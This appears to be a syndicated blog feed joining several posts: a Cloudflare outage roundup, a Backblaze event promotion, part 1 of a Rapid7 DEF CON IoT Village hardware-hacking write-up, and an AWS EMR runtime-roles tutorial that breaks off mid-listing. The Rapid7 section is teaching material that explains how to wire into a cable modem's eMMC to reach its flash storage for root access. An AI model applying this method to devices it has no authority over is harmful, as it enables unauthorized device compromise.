Access Haiti provides AS27774 (Haiti Networking Group) with Internet connectivity (as an “upstream” provider), so the fiber cut impacted their connectivity as well, causing the outage shown in the figure below.

Internet disruptions overview for Q3 2022

Technical problems

As a heading, “technical problems” can be a catch-all, referring to multiple types of issues, including misconfigurations and routing problems. However, it is also sometimes the official explanation given by a government or telecommunications company for an observed Internet disruption.

Rogers

Arguably the most significant Internet disruption so far this year took place on AS812 (Rogers), one of Canada’s largest Internet service providers. At around 0845 UTC on July 8, a near complete loss of traffic was observed, as seen in the figure below.

Internet disruptions overview for Q3 2022

The figure below shows that small amounts of traffic were seen from the network over the course of the outage, but it took nearly 24 hours for traffic to return to normal levels.

Internet disruptions overview for Q3 2022

A notice posted by the Rogers CEO explained that “We now believe we’ve narrowed the cause to a network system failure following a maintenance update in our core network, which caused some of our routers to malfunction early Friday morning. We disconnected the specific equipment and redirected traffic, which allowed our network and services to come back online over time as we managed traffic volumes returning to normal levels.” A Cloudflare blog post covered the Rogers outage in real-time, highlighting related BGP activity and small increases of traffic.

Chad

A four-hour near-complete Internet outage took place in Chad on August 12, occurring between 1045 and 1300 local time (0945 to 1400 UTC). Authorities in Chad said that the disruption was due to a “technical problem” on connections between Sudachad and networks in Cameroon and Sudan.

Internet disruptions overview for Q3 2022

Unknown

In many cases, observed Internet disruptions are attributed to underlying causes thanks to statements by service providers, government officials, or media coverage of an associated event. However, for some disruptions, no published explanation or associated event could be found.

On August 11, a multi-hour outage impacted customers of US telecommunications provider Centurylink in states including Colorado, Iowa, Missouri, Montana, New Mexico, Utah, and Wyoming, as shown in the figure below. The outage was also visible in a traffic graph for AS209, the associated autonomous system.

Internet disruptions overview for Q3 2022
Internet disruptions overview for Q3 2022

On August 30, satellite Internet provider suffered a global service disruption, lasting between 0630-1030 UTC as seen in the figure below.

Internet disruptions overview for Q3 2022

Conclusion

As part of Cloudflare’s Birthday Week at the end of September, we launched the Cloudflare Radar Outage Center (CROC). The CROC is a section of our new Radar 2.0 site that archives information about observed Internet disruptions. The underlying data that powers the CROC is also available through an API, enabling interested parties to incorporate data into their own tools, sites, and applications. For regular updates on Internet disruptions as they occur and other Internet trends, follow @CloudflareRadar on Twitter.

Backblaze at Educause ’22: Fueling Innovation in Higher Education

Post Syndicated from Jennifer Newman original https://www.backblaze.com/blog/backblaze-at-educause-22-fueling-innovation-in-higher-education/


Like many industries, higher education has spent the last decade discovering the transformative power of the cloud and moving into the next century. The cost savings of running a more efficient tech stack and easier access to the vital data it contains have allowed those institutions to pursue the practical and academic discoveries they were built for.

Graduating to Cloud Storage

Across the board, colleges and universities are pushing the boundaries of what cloud storage can do—and their creativity is paying huge dividends for their efficiency and security. We’ve included a few examples below that show just how these institutions have been able to maximize their cloud storage capabilities to reduce costs, modernize outdated operations, protect sensitive student and research data, and extend their ability to provide knowledge to a wider audience.

Citing Our Work

Pittsburg State: Located in Kansas, this university found themselves with nearly five decades of data in harm’s way due to the constant threat of tornadoes. Adding off-premises storage with Backblaze B2 not only gave them the geographical separation they needed, but the addition of a virtual air gap through Object Lock quadrupled their protection against ransomware.

Coast Community College District: CCCD aiming to update its data management system and eliminate costly delays from tape backups. Their existing tapes needed to be physically chauffeured between the three colleges in the district—Coastline Community College, Golden West College, and Orange Coast College—in friendly L.A. traffic. Backblaze B2’s S3 Compatible APIs made for a seamless integration with Cohesity backup.

UCSC–Silicon Valley: A 22-person video production team at the university’s online learning program, UC–Scout had quickly reached their storage capacity after archiving thousands of videos. By leveraging Backblaze B2, their IT team was able to streamline the entire production process, saving money and unleashing the team’s full creative potential.

Kanopy: The “Netflix for libraries” overhauled its tech stack in order to share its massive selection of more than 25,000 videos with thousands of schools and public libraries. After migrating to Backblaze B2, Kanopy was able to scale efficiently and rapidly accelerate content onboarding.

Gladstone Institutes: Gladstone Institutes needed an affordable, reliable backup system that would allow their researchers to focus on the life-saving developments they were pursuing in the lab. Cloud storage’s increased reliability allowed them to move away from LTO, and off-premise storage shielded their findings from the potential for natural disasters.

Office Hours—No Lectures

If you’re planning to attend EduCause ’22, you can learn more about the many possibilities Backblaze opens up in higher education. Through a new partnership between Backblaze and Carahsoft, public sector customers can now leverage their existing state, local, and federal buying programs to access Backblaze B2 Cloud Storage.

In addition to a live demo of Instant Recovery in the Veeam booth, we’re proud to sponsor the Carahsoft Happy Hour Reception. With special cocktails you won’t find anywhere else (try the “Backblaze Special;” you’ll love it), this is a great opportunity to network with fellow educators and learn more about how Backblaze can help you leverage your tech stack.

The post Backblaze at Educause ’22: Fueling Innovation in Higher Education appeared first on Backblaze Blog | Cloud Storage & Cloud Backup.

Hands-On IoT Hacking: Rapid7 at DEF CON 30 IoT Village, Part 1

Post Syndicated from Deral Heiland original https://blog.rapid7.com/2022/10/18/hands-on-iot-hacking-rapid7-at-def-con-30-iot-village-part-1/

Hands-On IoT Hacking: Rapid7 at DEF CON 30 IoT Village, Part 1

Rapid7 was back this year at DEF CON 30 participating at the IoT Village with another hands-on hardware hacking exercise, with the goal of teaching attendees’ various concepts and methods for IoT hacking. Over the years, these exercises have covered several different embedded device topics, including how to use a Logic Analyzer, extracting firmware, and gaining root access to an embedded IoT device.

Like last year, we had many IoT Village attendees request a copy of our exercise manual, so again I decided to create an in-depth write-up about the exercise we ran, with some expanded context to answer several questions and expand on the discussion we had with attendees at this year’s DEF CON IoT Village.

This year’s exercise focused on the following key areas:

  • Interaction with eMMC in circuit
  • Using Linux dd command to make binary copy of flash memory
  • Use unsquashfs and mksquashfs commands to unpack and repack read only squash file systems
  • Alter startup files within the embedded Linux operating system to execute code during device startup
  • Leverage dropbear to enable SSH access

Summary of exercise

The goal of this year’s hands-on hardware hacking exercise was to gain root access to a Arris SB6190 Cable modem without needing to install any external code. To do this, the user interacted with the device via a PHISON PS8211-0 embedded multimedia controller (eMMC) to mount up and gain access to the NAND flash memory storage. With NAND flash memory access, the user was able to identify the partitions of interest and extract those partitions using the Linux dd command.

Next, the user extracted the filesystem from the partition binary files and was then able to modify key elements to enable SSH access over the ethernet connection. After the modification where completed the filesystems were repacked and written back to the modem device. Finally, the attendee was able to power up the device and login over ethernet using SSH with root access and default device password.

Hands-On IoT Hacking: Rapid7 at DEF CON 30 IoT Village, Part 1

eMMC access to flash memory

In this first section of the exercise, we focused on understanding the process of gaining access to the NAND flash memory by interacting with a PHISON PS8211-0 embedded multimedia controller (eMMC).

Wiring up eMMC and SD card breakout board

To interact with typical eMMC devices, we typically need the following connections.

  • CMD Command
  • DAT Data
  • CLK Clock
  • VCC Voltage 3.3v
  • VCCq Controller Voltage 1.8v – 3.3v
  • GND Ground

As shown in the above bullets, there are typically two different voltages required to interact with eMMC chips. However, in this case, we determined that the PHISON PS8211-0 eMMC chip did not have a different controller voltage for VCCq, meaning that the voltage used was only 3.3v for this example.

When connecting to and interacting with an eMMC device, we usually can utilize the internal power supply of the device. This often works well when different VCC and VCCq voltages are required, but in those cases, we also have to hold the microcontroller unit (MCU) at reset state to prevent the processor from causing interruption when trying to read memory. In this example, we found that the PHISON eMMC chip and NAND memory could be powered by supplying the voltage externally via the SD Card reader.

When using an SD Card reader to supply voltage, we must avoid hooking up the device’s normal source of power also. Hooking both sources – normal and SD Card – into the devices will lead to permanent damage to the device.

When it comes to soldering the needed wiring for this exercise, we realized allowing attendees to do the soldering connection would be much more complex than we could support. So, all the wiring was presoldered before the IoT Village event using 30-gauge color-coded wirewrap wire. This wiring was then attached to a SD Card breakout board as shown below in Figure 1:

  • White = Data
  • Blue = Clock
  • Yellow = Command
  • Red = Voltage (VCC)
  • Black = Ground
Hands-On IoT Hacking: Rapid7 at DEF CON 30 IoT Village, Part 1
Hands-On IoT Hacking: Rapid7 at DEF CON 30 IoT Village, Part 1
Figure 1: Wiring Hookups

Also, as you can see in the above images, the wires do not run parallel against each other, but have a reasonable gap between them and pass over each other perpendicularly when they cross over. This is because we found during testing that if we ran wires directly next to each other, it caused the partitions to fail to mount properly, most likely because noise was induced into the lines from the other lines affecting the signal.

Note: If you are looking to do your own wiring, the 30-gauge wirewrap wire I used is a Polyvinylidene fluoride coated insulation wire under the brand name of Kynar. The benefit of using Kynar wirewrap is that this insulation does not melt or shrink as easily from heat from the solder iron. When heated by a solder iron, standard plastic-coated insulation will shrink back, exposing uninsulated wire. This can lead to wires shorting out on the circuit board.

Connect SD card reader

With the modem wired up to SD Card breakout as shown above we can mount NAND flash memory by connecting a SD Card reader. Note, not all SD Card readers will work, I used a simple trial and error method with several SD Card readers I had in my possession until I found that an inexpensive DYNEX brand reader worked. It should be attached as shown below in Figure 2:

Hands-On IoT Hacking: Rapid7 at DEF CON 30 IoT Village, Part 1
Figure 2: Connected SD Card Reader

Once plugged in, the various partitions on the Cable modem NAND Flash memory should start loading. In this case a total of seven partitions mounted up. This can take a few minutes to complete. If your system opened each one of the volumes as it mounted, I typically shut them down to avoid all the confusion on your system desktop. To see the layout of the various partitions on the NAND Flash and gather information as needed for reading and writing to the correct partitions. We used the Linux application Disks. Once Disks is opened you can click on the 118 MB Drive in the left column, and it will show all of the partitions and should look something like Figure 3 below:

Hands-On IoT Hacking: Rapid7 at DEF CON 30 IoT Village, Part 1
Figure 3: Disks NAND Flash Partitions

In our second installment of this 4-part blog series, we’ll discuss the step of extracting partition data. Check back with us next week!

Introducing runtime roles for Amazon EMR steps: Use IAM roles and AWS Lake Formation for access control with Amazon EMR

Post Syndicated from Stefano Sandona original https://aws.amazon.com/blogs/big-data/introducing-runtime-roles-for-amazon-emr-steps-use-iam-roles-and-aws-lake-formation-for-access-control-with-amazon-emr/

You can use the Amazon EMR Steps API to submit Apache Hive, Apache Spark, and others types of applications to an EMR cluster. You can invoke the Steps API using Apache Airflow, AWS Steps Functions, the AWS Command Line Interface (AWS CLI), all the AWS SDKs, and the AWS Management Console. Jobs submitted with the Steps API use the Amazon Elastic Compute Cloud (Amazon EC2) instance profile to access AWS resources such as Amazon Simple Storage Service (Amazon S3) buckets, AWS Glue tables, and Amazon DynamoDB tables from the cluster.

Previously, if a step needed access to a specific S3 bucket and another step needed access to a specific DynamoDB table, the AWS Identity and Access Management (IAM) policy attached to the instance profile had to allow access to both the S3 bucket and the DynamoDB table. This meant that the IAM policies you assigned to the instance profile had to contain a union of all the permissions for every step that ran on an EMR cluster.

We’re happy to introduce runtime roles for EMR steps. A runtime role is an IAM role that you associate with an EMR step, and jobs use this role to access AWS resources. With runtime roles for EMR steps, you can now specify different IAM roles for the Spark and the Hive jobs, thereby scoping down access at a job level. This allows you to simplify access controls on a single EMR cluster that is shared between multiple tenants, wherein each tenant can be easily isolated using IAM roles.

The ability to specify an IAM role with a job is also available on Amazon EMR on EKS and Amazon EMR Serverless. You can also use AWS Lake Formation to apply table- and column-level permission for Apache Hive and Apache Spark jobs that are submitted with EMR steps. For more information, refer to Configure runtime roles for Amazon EMR steps.

In this post, we dive deeper into runtime roles for EMR steps, helping you understand how the various pieces work together, and how each step is isolated on an EMR cluster.

Solution overview

In this post, we walk through the following:

  1. Create an EMR cluster enabled to use the new role-based access control with EMR steps.
  2. Create two IAM roles with different permissions in terms of the Amazon S3 data and Lake Formation tables they can access.
  3. Allow the IAM principal submitting the EMR steps to use these two IAM roles.
  4. See how EMR steps running with the same code and trying to access the same data have different permissions based on the runtime role specified at submission time.
  5. See how to monitor and control actions using source identity propagation.

Set up EMR cluster security configuration

Amazon EMR security configurations simplify applying consistent security, authorization, and authentication options across your clusters. You can create a security configuration on the Amazon EMR console or via the AWS CLI or AWS SDK. When you attach a security configuration to a cluster, Amazon EMR applies the settings in the security configuration to the cluster. You can attach a security configuration to multiple clusters at creation time, but can’t apply them to a running cluster.

To enable runtime roles for EMR steps, we have to create a security configuration as shown in the following code and enable the runtime roles property (configured via EnableApplicationScopedIAMRole). In addition to the runtime roles, we’re enabling propagation of the source identity (configured via PropagateSourceIdentity) and support for Lake Formation (configured via LakeFormationConfiguration). The source identity is a mechanism to monitor and control actions taken with assumed roles. Enabling Propagate source identity allows you to audit actions performed using the runtime role. Lake Formation is an AWS service to securely manage a data lake, which includes defining and enforcing central access control policies for your data lake.

Create a file called step-runtime-roles-sec-cfg.json with the following content:

{
    "AuthorizationConfiguration": {
        "IAMConfiguration": {
            "EnableApplicationScopedIAMRole": true,
            "ApplicationScopedIAMRoleConfiguration": 
                {
                    "PropagateSourceIdentity": true
                }
        },
        "LakeFormationConfiguration": {
            "AuthorizedSessionTagValue": "Amazon EMR"
        }
    }
}

Create the Amazon EMR security configuration:

aws emr create-security-configuration \
--name 'iamconfig-with-iam-lf' \
--security-configuration file://step-runtime-roles-sec-cfg.json

You can also do the same via the Amazon console:

  1. On the Amazon EMR console, choose Security configurations in the navigation pane.
  2. Choose Create.
  3. Choose Create.
  4. For Security configuration name, enter a name.
  5. For Security configuration setup options, select Choose custom settings.
  6. For IAM role for applications, select Runtime role.
  7. Select Propagate source identity to audit actions performed using the runtime role.
  8. For Fine-grained access control, select AWS Lake Formation.
  9. Complete the security configuration.

The security configuration appears in your security configuration list. You can also see that the authorization mechanism listed here is the runtime role instead of the instance profile.

Launch the cluster

Now we launch an EMR cluster and specify the security configuration we created. For more information, refer to Specify a security configuration for a cluster.

The following code provides the AWS CLI command for launching an EMR cluster with the appropriate security configuration. Note that this cluster is launched on the default VPC and public subnet with the default IAM roles. In addition, the cluster is launched with one primary and one core instance of the specified instance type. For more details on how to customize the launch parameters, refer to create-cluster.

If the default EMR roles EMR_EC2_DefaultRole and EMR_DefaultRole don’t exist in IAM in your account (this is the first time you’re launching an EMR cluster with those), before launching the cluster, use the following command to create them:

aws emr create-default-roles

Create the cluster with the following code:

#Change with your Key Pair
KEYPAIR=<MY_KEYPAIR>
INSTANCE_TYPE="r4.4xlarge"
#Change with your Security Configuration Name
SECURITY_CONFIG="iamconfig-with-iam-lf"
#Change with your S3 log URI
LOG_URI="s3://mybucket/logs/"

aws emr create-cluster \
--name "iam-passthrough-cluster" \
--release-label emr-6.7.0 \
--use-default-roles \
--security-configuration $SECURITY_CONFIG \
--ec2-attributes KeyName=$KEYPAIR \
--instance-groups InstanceGroupType=MASTER,InstanceCount=1,InstanceType=$INSTANCE_TYPE  InstanceGroupType=CORE,InstanceCount=1,InstanceType=$INSTANCE_TYPE \
--applications Name=Spark Name=Hadoop Name=Hive \
--log-uri $LOG_URI

When the cluster is fully provisioned (Waiting state), let’s try to run a step on it with runtime roles for EMR steps enabled:

#Change with your EMR cluster ID
CLUSTER_ID=j-XXXXXXXXXXXXX
aws emr add-steps \
--cluster-id $CLUSTER_ID \
--steps '[{
            "Type": "CUSTOM_JAR",
            "ActionOnFailure": "CONTINUE",
            "Jar": "command-runner.jar",
            "Name": "Spark Example",
            "Args": [
              "spark-submit",
              "--class",
              "org.apache.spark.examples.SparkPi",
              "/usr/lib/spark/examples/jars/spark-examples.jar",
              "5"
            ]
        }]'

After launching the command, we receive the following as output:

An error occurred (ValidationException) when calling the AddJobFlowSteps operation: Runtime roles are required for this cluster. Please specify the role using the ExecutionRoleArn parameter.

The step failed, asking us to provide a runtime role. In the next section, we set up two IAM roles with different permissions and use them as the runtime roles for EMR steps.

Set up IAM roles as runtime roles

Any IAM role that you want to use as a runtime role for EMR steps must have a trust policy that allows the EMR cluster’s EC2 instance profile to assume it. In our setup, we’re using the default IAM role EMR_EC2_DefaultRole as the instance profile role. In addition, we create two IAM roles called test-emr-demo1 and test-emr-demo2 that we use as runtime roles for EMR steps.

The following code is the trust policy for both of the IAM roles, which lets the EMR cluster’s EC2 instance profile role, EMR_EC2_DefaultRole, assume these roles and set the source identity and LakeFormationAuthorizedCaller tag on the role sessions. The TagSession permission is needed so that Amazon EMR can authorize to Lake Formation. The SetSourceIdentity statement is needed for the propagate source identity feature.

Create a file called trust-policy.json with the following content (replace 123456789012 with your AWS account ID):

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "AWS": "arn:aws:iam::123456789012:role/EMR_EC2_DefaultRole"
            },
            "Action": "sts:AssumeRole"
        },
        {
            "Effect": "Allow",
            "Principal": {
                "AWS": "arn:aws:iam::123456789012:role/EMR_EC2_DefaultRole"
            },
            "Action": "sts:SetSourceIdentity"
        },
        {
            "Effect": "Allow",
            "Principal": {
                "AWS": "arn:aws:iam::123456789012:role/EMR_EC2_DefaultRole"
            },
            "Action": "sts:TagSession",
            "Condition": {
                "StringEquals": {
                    "aws:RequestTag/LakeFormationAuthorizedCaller": "Amazon EMR"
                }
            }
        }
    ]
}

Use that policy to create the two IAM roles, test-emr-demo1 and test-emr-demo2:

aws iam create-role \
--role-name test-emr-demo1 \
--assume-role-policy-document file://trust-policy.json

aws iam create-role \
--role-name test-emr-demo2 \
--assume-role-policy-document file://trust-policy.json

Set up permissions for the principal submitting the EMR steps with runtime roles

The IAM principal submitting the EMR steps needs to have permissions to invoke the AddJobFlowSteps API. In addition, you can use the Condition key elasticmapreduce:ExecutionRoleArn to control access to specific IAM roles. For example, the following policy allows the IAM principal to only use IAM roles test-emr-demo1 and test-emr-demo2 as the runtime roles for EMR steps.

  1. Create the job-submitter-policy.json file with the following content (replace 123456789012 with your AWS account ID):
    {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Sid": "AddStepsWithSpecificExecRoleArn",
                "Effect": "Allow",
                "Action": [
                    "elasticmapreduce:AddJobFlowSteps"
                ],
                "Resource": "*",
                "Condition": {
                    "StringEquals": {
                        "elasticmapreduce:ExecutionRoleArn": [
                            "arn:aws:iam::123456789012:role/test-emr-demo1",
                            "arn:aws:iam::123456789012:role/test-emr-demo2"
                        ]
                    }
                }
            },
            {
                "Sid": "EMRDescribeCluster",
                "Effect": "Allow",
                "Action": [
                    "elasticmapreduce:DescribeCluster"
                ],
                "Resource": "*"
            }
        ]
    }

  2. Create the IAM policy with the following code:
    aws iam create-policy \
    --policy-name emr-runtime-roles-submitter-policy \
    --policy-document file://job-submitter-policy.json

  3. Assign this policy to the IAM principal (IAM user or IAM role) you’re going to use to submit the EMR steps (replace 123456789012 with your AWS account ID and replace john with the IAM user you use to submit your EMR steps):
    aws iam attach-user-policy \
    --user-name john \
    --policy-arn "arn:aws:iam::123456789012:policy/emr-runtime-roles-submitter-policy"

IAM user john can now submit steps using arn:aws:iam::123456789012:role/test-emr-demo1 and arn:aws:iam::123456789012:role/test-emr-demo2 as the step runtime roles.

Use runtime roles with EMR steps

We now prepare our setup to show runtime roles for EMR steps in action.

Set up Amazon S3

To prepare your Amazon S3 data, complete the following steps:

  1. Create a CSV file called test.csv with the following content:
    1,a,1a
    2,b,2b

  2. Upload the file to Amazon S3 in three different locations:
    #Change this with your bucket name
    BUCKET_NAME="emr-steps-roles-new-us-east-1"
    
    aws s3 cp test.csv s3://${BUCKET_NAME}/demo1/
    aws s3 cp test.csv s3://${BUCKET_NAME}/demo2/
    aws s3 cp test.csv s3://${BUCKET_NAME}/nondemo/

    For our initial test, we use a PySpark application called test.py with the following contents:

    from pyspark.sql import SparkSession
    spark = SparkSession.builder.appName("my app").enableHiveSupport().getOrCreate()
    
    #Change this with your bucket name
    BUCKET_NAME="emr-steps-roles-new-us-east-1"
    
    try:
      spark.read.csv("s3://" + BUCKET_NAME + "/demo1/test.csv").show()
      print("Accessed demo1")
    except:
      print("Could not access demo1")
    
    try:
      spark.read.csv("s3://" + BUCKET_NAME + "/demo2/test.csv").show()
      print("Accessed demo2")
    except:
      print("Could not access demo2")
    
    try:
      spark.read.csv("s3://" + BUCKET_NAME + "/nondemo/test.csv").show()
      print("Accessed nondemo")
    except:
      print("Could not access nondemo")
    spark.stop()

    In the script, we’re trying to access the CSV file present under three different prefixes in the test bucket.

  3. Upload the Spark application inside the same S3 bucket where we placed the test.csv file but in a different location:
    #Change this with your bucket name
    BUCKET_NAME="emr-steps-roles-new-us-east-1"
    aws s3 cp test.py s3://${BUCKET_NAME}/scripts/

Set up runtime role permissions

To show how runtime roles for EMR steps works, we assign to the roles we created different IAM permissions to access Amazon S3. The following table summarizes the grants we provide to each role (emr-steps-roles-new-us-east-1 is the bucket you configured in the previous section).

S3 locations \ IAM Roles test-emr-demo1 test-emr-demo2
s3://emr-steps-roles-new-us-east-1/* No Access No Access
s3://emr-steps-roles-new-us-east-1/demo1/* Full Access No Access
s3://emr-steps-roles-new-us-east-1/demo2/* No Access Full Access
s3://emr-steps-roles-new-us-east-1/scripts/* Read Access Read Access
  1. Create the file demo1-policy.json with the following content (substitute emr-steps-roles-new-us-east-1 with your bucket name):
    {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Effect": "Allow",
                "Action": [
                    "s3:*"
                ],
                "Resource": [
                    "arn:aws:s3:::emr-steps-roles-new-us-east-1/demo1",
                    "arn:aws:s3:::emr-steps-roles-new-us-east-1/demo1/*"
                ]                    
            },
            {
                "Effect": "Allow",
                "Action": [
                    "s3:Get*"
                ],
                "Resource": [
                    "arn:aws:s3:::emr-steps-roles-new-us-east-1/scripts",
                    "arn:aws:s3:::emr-steps-roles-new-us-east-1/scripts/*"
                ]                    
            }
        ]
    }

  2. Create the file demo2-policy.json with the following content (substitute emr-steps-roles-new-us-east-1 with your bucket name):
    {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Effect": "Allow",
                "Action": [
                    "s3:*"
                ],
                "Resource": [
                    "arn:aws:s3:::emr-steps-roles-new-us-east-1/demo2",
                    "arn:aws:s3:::emr-steps-roles-new-us-east-1/demo2/*"
                ]                    
            },
            {
                "Effect": "Allow",
                "Action": [
                    "s3:Get*"
                ],
                "Resource": [
                    "arn:aws:s3:::emr-steps-roles-new-us-east-1/scripts",
                    "arn:aws:s3:::emr-steps-roles-new-us-east-1/scripts/*"
                ]                    
            }
        ]
    }

  3. Create our IAM policies:
    aws iam create-policy \
    --policy-name test-emr-demo1-policy \
    --policy-document file://demo1-policy.json
    
    aws iam create-policy \
    --policy-name test-emr-demo2-policy \
    --policy-document file://demo2-policy.json

  4. Assign to each role the related policy (replace 123456789012 with your AWS account ID):
    aws iam attach-role-policy \
    --role-name test-emr-demo1 \
    --policy-arn "arn:aws:iam::123456789012:policy/test-emr-demo1-policy"
    
    aws iam attach-role-policy \
    --role-name test-emr-demo2 \
    --policy-arn "arn:aws:iam::123456789012:policy/test-emr-demo2-policy"

    To use runtime roles with Amazon EMR steps, we need to add the following policy to our EMR cluster’s EC2 instance profile (in this example EMR_EC2_DefaultRole). With this policy, the underlying EC2 instances for the EMR cluster can assume the runtime role and apply a tag to that runtime role.

  5. Create the file runtime-roles-policy.json with the following content (replace 123456789012 with your AWS account ID):
    {
        "Version": "2012-10-17",
        "Statement": [{
                "Sid": "AllowRuntimeRoleUsage",
                "Effect": "Allow",
                "Action": [
                    "sts:AssumeRole",
                    "sts:TagSession",
                    "sts:SetSourceIdentity"
                ],
                "Resource": [
                    "arn:aws:iam::123456789012:role/test-emr-demo1",
                    "arn:aws:iam::123456789012:role/test-emr-demo2"
                ]
            }
        ]
    }

  6. Create the IAM policy:
    aws iam create-policy \
    --policy-name emr-runtime-roles-policy \
    --policy-document file://runtime-roles-policy.json

  7. Assign the created policy to the EMR cluster’s EC2 instance profile, in this example EMR_EC2_DefaultRole:
    aws iam attach-role-policy \
    --role-name EMR_EC2_DefaultRole \
    --policy-arn "arn:aws:iam::123456789012:policy/emr-runtime-roles-policy"

Test permissions with runtime roles

We’re now ready to perform our first test. We run the test.py script, previously uploaded to Amazon S3, two times as Spark steps: first using the test-emr-demo1 role and then using the test-emr-demo2 role as the runtime roles.

To run an EMR step specifying a runtime role, you need the latest version of the AWS CLI. For more details about updating the AWS CLI, refer to Installing or updating the latest version of the AWS CLI.

Let’s submit a step specifying test-emr-demo1 as the runtime role:

#Change with your EMR cluster ID
CLUSTER_ID=j-XXXXXXXXXXXXX
#Change with your AWS Account ID
ACCOUNT_ID=123456789012
#Change with your Bucket name
BUCKET_NAME=emr-steps-roles-new-us-east-1

aws emr add-steps \
--cluster-id $CLUSTER_ID \
--steps '[{
            "Type": "CUSTOM_JAR",
            "ActionOnFailure": "CONTINUE",
            "Jar": "command-runner.jar",
            "Name": "Spark Example",
            "Args": [
              "spark-submit",
              "s3://'"${BUCKET_NAME}"'/scripts/test.py"
            ]
        }]' \
--execution-role-arn arn:aws:iam::${ACCOUNT_ID}:role/test-emr-demo1

This command returns an EMR step ID. To check our step output logs, we can proceed two different ways:

  • From the Amazon EMR console – On the Steps tab, choose the View logs link related to the specific step ID and select stdout.
  • From Amazon S3 – While launching our cluster, we configured an S3 location for logging. We can find our step logs under $(LOG_URI)/steps/<stepID>/stdout.gz.

The logs could take a couple of minutes to populate after the step is marked as Completed.

The following is the output of the EMR step with test-emr-demo1 as the runtime role:

+---+---+---+
|_c0|_c1|_c2|
+---+---+---+
|  1|  a| 1a|
|  2|  b| 2b|
+---+---+---+

Accessed demo1
Could not access demo2
Could not access nondemo

As we can see, only the demo1 folder was accessible by our application.

Diving deeper into the step stderr logs, we can see that the related YARN application application_1656350436159_0017 was launched with the user 6GC64F33KUW4Q2JY6LKR7UAHWETKKXYL. We can confirm this by connecting to the EMR primary instance using SSH and using the YARN CLI:

[hadoop@ip-172-31-63-203]$ yarn application -status application_1656350436159_0017
...
Application-Id : application_1656350436159_0017
Application-Name : my app
Application-Type : SPARK
User : 6GC64F33KUW4Q2JY6LKR7UAHWETKKXYL
Queue : default
Application Priority : 0
...

Please note that in your case, the YARN application ID and the user will be different.

Now we submit the same script again as a new EMR step, but this time with the role test-emr-demo2 as the runtime role:

#Change with your EMR cluster ID
CLUSTER_ID=j-XXXXXXXXXXXXX
#Change with your AWS Account ID
ACCOUNT_ID=123456789012
#Change with your Bucket name
BUCKET_NAME=emr-steps-roles-new-us-east-1

aws emr add-steps \
--cluster-id $CLUSTER_ID \
--steps '[{
            "Type": "CUSTOM_JAR",
            "ActionOnFailure": "CONTINUE",
            "Jar": "command-runner.jar",
            "Name": "Spark Example",
            "Args": [
              "spark-submit",
              "s3://'"${BUCKET_NAME}"'/scripts/test.py"
            ]
        }]' \
--execution-role-arn arn:aws:iam::${ACCOUNT_ID}:role/test-emr-demo2

The following is the output of the EMR step with test-emr-demo2 as the runtime role:

Could not access demo1
+---+---+---+
|_c0|_c1|_c2|
+---+---+---+
|  1|  a| 1a|
|  2|  b| 2b|
+---+---+---+

Accessed demo2
Could not access nondemo

As we can see, only the demo2 folder was accessible by our application.

Diving deeper into the step stderr logs, we can see that the related YARN application application_1656350436159_0018 was launched with a different user 7T2ORHE6Z4Q7PHLN725C2CVWILZWYOLE. We can confirm this by using the YARN CLI:

[hadoop@ip-172-31-63-203]$ yarn application -status application_1656350436159_0018
...
Application-Id : application_1656350436159_0018
Application-Name : my app
Application-Type : SPARK
User : 7T2ORHE6Z4Q7PHLN725C2CVWILZWYOLE
Queue : default
Application Priority : 0
...

Each step was able to only access the CSV file that was allowed by the runtime role, so the first step was able to only access s3://emr-steps-roles-new-us-east-1/demo1/test.csv and the second step was only able to access s3://emr-steps-roles-new-us-east-1/demo2/test.csv. In addition, we observed that Amazon EMR created a unique user for the steps, and used the user to run the jobs. Please note that both roles need at least read access to the S3 location where the step scripts are located (for example, s3://emr-steps-roles-demo-bucket/scripts/test.py).

Now that we have seen how runtime roles for EMR steps work, let’s look at how we can use Lake Formation to apply fine-grained access controls with EMR steps.

Use Lake Formation-based access control with EMR steps

You can use Lake Formation to apply table- and column-level permissions with Apache Spark and Apache Hive jobs submitted as EMR steps. First, the data lake admin in Lake Formation needs to register Amazon EMR as the AuthorizedSessionTagValue to enforce Lake Formation permissions on EMR. Lake Formation uses this session tag to authorize callers and provide access to the data lake. The Amazon EMR value is referenced inside the step-runtime-roles-sec-cfg.json file we used earlier when we created the EMR security configuration, and inside the trust-policy.json file we used to create the two runtime roles test-emr-demo1 and test-emr-demo2.

We can do so on the Lake Formation console in the External data filtering section (replace 123456789012 with your AWS account ID).

On the IAM runtime roles’ trust policy, we already have the sts:TagSession permission with the condition “aws:RequestTag/LakeFormationAuthorizedCaller": "Amazon EMR". So we’re ready to proceed.

To demonstrate how Lake Formation works with EMR steps, we create one database named entities with two tables named users and products, and we assign in Lake Formation the grants summarized in the following table.

IAM Roles \ Tables entities
(DB)
users
(Table)
products
(Table)
test-emr-demo1 Full Read Access No Access
test-emr-demo2 Read Access on Columns: uid, state Full Read Access

Prepare Amazon S3 files

We first prepare our Amazon S3 files.

  1. Create the users.csv file with the following content:
    00005678,john,pike,england,london,Hidden Road 78
    00009039,paolo,rossi,italy,milan,Via degli Alberi 56A
    00009057,july,finn,germany,berlin,Green Road 90

  2. Create the products.csv file with the following content:
    P0000789,Bike2000,Sport
    P0000567,CoverToCover,Smartphone
    P0005677,Whiteboard X786,Home

  3. Upload these files to Amazon S3 in two different locations:
    #Change this with your bucket name
    BUCKET_NAME="emr-steps-roles-new-us-east-1"
    
    aws s3 cp users.csv s3://${BUCKET_NAME}/entities-database/users/
    aws s3 cp products.csv s3://${BUCKET_NAME}/entities-database/products/

Prepare the database and tables

We can create our entities database by using the AWS Glue APIs.

  1. Create the entities-db.json file with the following content (substitute emr-steps-roles-new-us-east-1 with your bucket name):
    {
        "DatabaseInput": {
            "Name": "entities",
            "LocationUri": "s3://emr-steps-roles-new-us-east-1/entities-database/",
            "CreateTableDefaultPermissions": []
        }
    }

  2. With a Lake Formation admin user, run the following command to create our database:
    aws glue create-database \
    --cli-input-json file://entities-db.json

    We also use the AWS Glue APIs to create the tables users and products.

  3. Create the users-table.json file with the following content (substitute emr-steps-roles-new-us-east-1 with your bucket name):
    {
        "TableInput": {
            "Name": "users",
            "StorageDescriptor": {
                "Columns": [{
                        "Name": "uid",
                        "Type": "string"
                    },
                    {
                        "Name": "name",
                        "Type": "string"
                    },
                    {
                        "Name": "surname",
                        "Type": "string"
                    },
                    {
                        "Name": "state",
